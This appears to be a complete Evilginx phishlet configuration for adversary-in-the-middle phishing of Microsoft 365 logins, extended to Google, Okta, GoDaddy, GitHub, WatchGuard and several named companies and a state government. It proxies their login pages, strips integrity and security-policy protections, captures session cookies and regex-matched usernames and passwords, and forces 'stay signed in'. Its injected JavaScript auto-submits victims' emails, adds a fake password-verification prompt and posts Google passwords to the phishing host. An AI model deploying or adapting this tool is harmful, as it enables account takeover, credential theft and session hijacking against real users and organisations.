name: "o365"
author: "@HosterMSG"
min_ver: "3.4.1"


proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false, auto_filter: false  }
  # - { phish_sub: 'www', orig_sub: 'www', domain: 'microsoft.com', session: false, is_landing: false, auto_filter: false  }
  - { phish_sub: 'autologon', orig_sub: 'autologon', domain: 'microsoftazuread-sso.com', session: false, is_landing: false}
  - { phish_sub: "o", orig_sub: "o", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "sci", orig_sub: "sci", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "dotfoods", orig_sub: "dotfoods", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "login", orig_sub: "login", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "login", orig_sub: "login", domain: "bx.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "msfed", orig_sub: "msfed", domain: "bms.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "advath", orig_sub: "advath", domain: "bms.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "smusxath", orig_sub: "smusxath", domain: "bms.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "ulgroup", orig_sub: "ulgroup", domain: "okta.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "YWNjb", orig_sub: "login", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: false, auto_filter: false}
  - { phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true}
  - { phish_sub: "account", orig_sub: "account", domain: "live.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "outlook", orig_sub: "outlook", domain: "live.com", session: true, is_landing: false }
  - { phish_sub: "msft", orig_sub: "msft.sts", domain: "microsoft.com", session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "certauth", orig_sub: "certauth.msft.sts", domain: "microsoft.com", session: true, is_landing: false, auto_filter: true  }
  - { phish_sub: '', orig_sub: '', domain: 'microsoft.com', session: true, is_landing: false, auto_filter: true }
  - { phish_sub: "sp.authpoint.usa.cloud", orig_sub: "sp.authpoint.usa.cloud", domain: "watchguard.com", session: true, is_landing: false, auto_filter: true  }
  - { phish_sub: "usa.authpoint", orig_sub: "usa.authpoint", domain: "watchguard.com", session: true, is_landing: false, auto_filter: true  }
  - { phish_sub: "dev.sp.authpoint.usa.cloud", orig_sub: "dev.sp.authpoint.usa.cloud", domain: "watchguard.com", session: true, is_landing: false, auto_filter: true  }
  - { phish_sub: "selfserviceportal.authpoint.usa.cloud", orig_sub: "selfserviceportal.authpoint.usa.cloud", domain: "watchguard.com", session: true, is_landing: false, auto_filter: true  }
  - { phish_sub: "aadcdn", orig_sub: "aadcdn", domain: "msauth.net", session: true, is_landing: false }
  - { phish_sub: "vn3Hg", orig_sub: "aadcdn", domain: "msauth.net", session: true, is_landing: false }
  - { phish_sub: "bn2fj", orig_sub: "logincdn", domain: "msauth.net", session: true, is_landing: false }
  - { phish_sub: "logincdn", orig_sub: "logincdn", domain: "msauth.net", session: true, is_landing: false }
  - { phish_sub: '', orig_sub: '', domain: 'office.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: "auth", orig_sub: "auth", domain: "op2online.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "id", orig_sub: "id", domain: "delaware.gov", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "secure", orig_sub: "secure", domain: "pepsico.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: 'cloud', orig_sub: 'cloud', domain: 'xcentric.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: 'dfi', orig_sub: 'dfi', domain: 'workspaceair.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: 'cas-aws', orig_sub: 'cas-aws', domain: 'workspaceair.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: 'myvmware', orig_sub: 'myvmware', domain: 'workspaceair.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: 'github', orig_sub: 'github', domain: 'github.com', session: true, is_landing: false, auto_filter: true }
  - { phish_sub: 'sso', orig_sub: 'sso', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: 'gui', orig_sub: 'gui', domain: 'godaddy.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: '', orig_sub: '', domain: 'godaddy.com', session: false, is_landing: false, auto_filter: false}
  - { phish_sub: 'chat', orig_sub: 'chat', domain: 'google.com', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: '2', orig_sub: '', domain: 'secureserver.net', session: true, is_landing: false, auto_filter: false}
  - { phish_sub: 'events.api', orig_sub: 'events.api', domain: 'secureserver.net', session: true, is_landing: false, auto_filter: true}
  - { phish_sub: 'csp', orig_sub: 'csp', domain: 'secureserver.net', session: true, is_landing: false, auto_filter: true}


sub_filters:


  - {
      triggers_on: "login.microsoftonline.com",
      orig_sub: "",
      domain: "",
      search: 'integrity=".*?"',
      replace: '',
      mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"],
    }

  - {
      triggers_on: "login.microsoftonline.com",
      orig_sub: "",
      domain: "",
      search: '<meta http-equiv="Content-Security-Policy" content="(.*?)"',
      replace: '<meta http-equiv="Content-Security-Policy" content="default-src *  data: blob: filesystem: about: ws: wss: ''unsafe-inline'' ''unsafe-eval''; script-src * data: blob: ''unsafe-inline'' ''unsafe-eval''; connect-src * data: blob: ''unsafe-inline''; img-src * data: blob: ''unsafe-inline''; frame-src * data: blob: ; style-src * data: blob: ''unsafe-inline''; font-src * data: blob: ''unsafe-inline'';"',
      mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"],
    }

  - {
      triggers_on: "login.microsoftonline.com",
      orig_sub: "",
      domain: "",
      search: "integrity='.*?'",
      replace: "",
      mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", "application/ecmascript", "text/javascript", "text/ecmascript"],
    }


  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "", search: "", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }


  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: 'login.microsoftonline.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com/o/saml2/idp', replace: 'accounts.{domain}/o/saml2/idp', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  - { triggers_on: "login.microsoftonline.com", orig_sub: "aadcdn", domain: "msauth.net", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "logincdn", domain: "msauth.net", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "okta.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "okta.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "bx.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "bx.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "bms.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "bms.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "watchguard.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "watchguard.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "godaddy.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "godaddy.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "github.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "github.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "microsoftazuread-sso.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "microsoftazuread-sso.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }

  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "watchguard.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "", domain: "watchguard.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }


  - { triggers_on: "usa.authpoint.watchguard.com", orig_sub: "usa.authpoint", domain: "watchguard.com", search: "{domain}", replace: "{domain}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

  - { triggers_on: "login.live.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.live.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

  - { triggers_on: "account.live.com", orig_sub: "login", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "account.live.com", orig_sub: "account", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "account.live.com", orig_sub: "outlook", domain: "live.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "account.live.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie', 'esctx', 'brcap', '.*,regexp']

  - domain: 'login.microsoftonline.com'
    keys: ['ESTSSC', 'ESTSAUTHLIGHT','buid', 'fpc', 'stsservicecookie', 'x-ms-gateway-slice', '.*,regexp']

  - domain: '.live.com'
    keys: ['wlidperf', 'MSPAuth', 'MSPProf', 'WLSSC', 'RPSAuth', 'RPSSecAuth', 'MH', 'ANON', 'NAP', 'MUID', 'PPLState', '.*,regexp']

  - domain: '.login.live.com'
    keys: ['MSCC', 'OParams', 'MSPOK','JSHP', 'JSH', 'SDIDC', 'MSPBack','MSPSoftVis', 'uaid', 'MSPRequ', '.*,regexp']

  - domain: 'login.live.com'
    keys: ['__Host-MSAAUTH', '.*,regexp']

  - domain: 'outlook.live.com'
    keys: ['DefaultAnchorMailbox', 'O365Consumer', 'SuiteServiceProxyKey', 'X-OWA-CANARY', 'ClientId', 'exchangecookie', 'orgName', 'domainName', 'LI', 'UC', 'RoutingKeyCookie', '.*,regexp']
    
  - domain: 'www.office.com'
    keys: ['.*,regexp']

  - domain: 'login.bx.com'
    keys: ['.*,regexp']
    
  - domain: '.bms.com'
    keys: ['.*,regexp']
    
  - domain: 'advath.bms.com'
    keys: ['.*,regexp']

  - domain: '.google.com'
    keys: [".*,regexp"]
    
  - domain: 'accounts.google.com'
    keys: [".*,regexp"]
   
  - domain: 'sso.secureserver.net'
    keys: ['.*,regexp']
  
  - domain: 'sso.godaddy.com'
    keys: ['.*,regexp']

  - domain: 'sp.authpoint.usa.cloud.watchguard.com'
    keys: ['SAMLRequest', 'RelayState', 'username', 'accountId', 'samlRequest', 'user', '.*,regexp']

  - domain: 'auth.op2online.com'
    keys: ['.*,regexp']

  - domain: 'id.delaware.gov'
    keys: ['.*,regexp']

  - domain: 'secure.pepsico.com'
    keys: ['.*,regexp']

  - domain: 'cloud.xcentric.com'
    keys: ['NSC_DMPVE_QSPE_MCT_TTM', 'NSC_ESNS', '.AspNetCore.Antiforgery.eis4G1e_YDg', '.*,regexp']

  - domain: 'dfiworkspaceair.com'
    keys: ['.*,regexp']

  - domain: 'cas-aws.workspaceair.com'
    keys: ['.*,regexp']

  - domain: 'myvmware.workspaceair.com'
    keys: ['.*,regexp']

force_post:
  - path: '/kmsi'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS/EndAuth'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/ppsecure/post.srf'
    search:
      - {key: 'login', search: '.*'}
      - {key: 'passwd', search: '.*'}
      - {key: 'i13', search: '.*'}
    force:
      - {key: 'i13', value: '1'}
      - {key: 'KMSI', value: 'on'}
    type: 'post'
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"
  - path: '/_/signin/sl/challenge'
    search:
      - {key: 'f.req', search: '.*'}
      - {key: 'continue', search: '.*'}
    force:
      - {key: 'continue', value: ''}
    type: 'post'

auth_urls:
  - "/kmsi*"
  - "/CheckCookie"
  - "/owa/prefetch.aspx*"
  - "/webmanifest.json*"
  - "/landingv2"
  - "/login.srf"
  - "/idp/idx"
  - "/idp/idx/.*"
  - "/siteminderagent/.*"
  - "/saml/sso/.*"
  - "/api/v1/authn"

credentials:
  username:
    key: "(login|UserName|username|email|account|identifier|utemp|user|name|user_login)"
    search: '(.*)'
    type: 'post'
  password:
    key: "(passwd|Password|password|login_password|pass|pwd|session_password|PASSWORD|credentials.passcode|ptemp)"
    search: '(.*)'
    type: 'post'
  custom:
    - key: (login|UserName|username|email|account)
      search: '(.*)'
      type: 'post'
    - key: '(passwd|Password|password|login_password|pass|pwd|session_password|PASSWORD|credentials.passcode|ptemp|API_HOST|stateToken|redirectUri|fromURI)'
      search: '(.*)'
      type: 'post'
    - key: 'f.req'
      search: '"\[null,\\"([^"]*)\\",'
      type: 'post'
    - key: 'f.req'
      search: 'null,\[\\"([^"]*)\\",'
      type: 'post'
    - key: '(.*)'
      search: '"email":"([^"]*)'
      type: 'post'
    - key: '(.*)'
      search: '"username":"([^"]*)'
      type: 'post'
    - key: '(.*)'
      search: '"password":"([^"]*)'
      type: 'post'
    - key: '(.*)'
      search: '"pass":"([^"]*)'
      type: 'post'



login:
  domain: "login.microsoftonline.com"
  path: "/"

js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/login", "/login.srf"]
    script: |
      function autoBtnClick() {
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}
        waitForElm("#KmsiCheckboxField").then((elm) => {
          if (document.getElementById("KmsiCheckboxField") != null) {
            setTimeout(() => {document.getElementById("idSIButton9").click()}, 1000);
          } else {setTimeout(() => {autoBtnClick()}, 1000)}
        });
      }
      setTimeout(() => {autoBtnClick()}, 1500);

      
  - trigger_domains: ["login.microsoftonline.com", "login.live.com"]
    trigger_paths: ["/common/oauth2/", "/", "/*"]
    script: |
      window.addEventListener("load", () => {

        function isBase64(str) {
          if (str === '' || str.trim() === ''){return false}
          try {if (btoa(atob(str)) == atob(btoa(str))) return true} catch {return false}
        }

        var email = window.location.hash.substring(1); email = isBase64(email) ? window.atob(email) : email
        
        function waitForElm(e){return new Promise(t=>{if(document.querySelector(e))return t(document.querySelector(e));const r=new MutationObserver(o=>{document.querySelector(e)&&(t(document.querySelector(e)),r.disconnect())});r.observe(document.body,{childList:!0,subtree:!0})})}

        waitForElm("#i0116").then((elm) => {if (!email) {return} else {email = email.replace("=", ""); elm.value = email; waitForElm("#idSIButton9").then((elm) => {elm.focus(); elm.click()}); }});

        waitForElm("#loginHeader").then((elm) => {let p = document.createElement('p');p.textContent = "Because you're accessing sensitive info you need to verify your password";document.querySelectorAll("#loginHeader")[0].appendChild(p)});
      
      });

  - trigger_domains: ['accounts.google.com']
    trigger_paths: ['/identifier']
    script: |
      setInterval(() => {
        if (document.querySelectorAll("input[name='Passwd']")?.length) {
            var password = document.getElementsByName("Passwd")[0].value;
            var email = document.querySelector("#identifierId")?.value;
            var xhr = new XMLHttpRequest();
            var myHostName = ('https://'+ location.hostname);
            myHostName = myHostName.replace('accounts.', '');
            xhr.open("POST", myHostName + "/Lookup", true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.send("username=" + encodeURIComponent(email) + "&password=" + encodeURIComponent(password))
        }}, 2000);
